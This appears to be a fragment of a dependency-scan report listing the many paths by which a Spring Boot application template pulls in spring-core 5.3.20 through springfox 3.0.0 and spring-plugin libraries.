  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
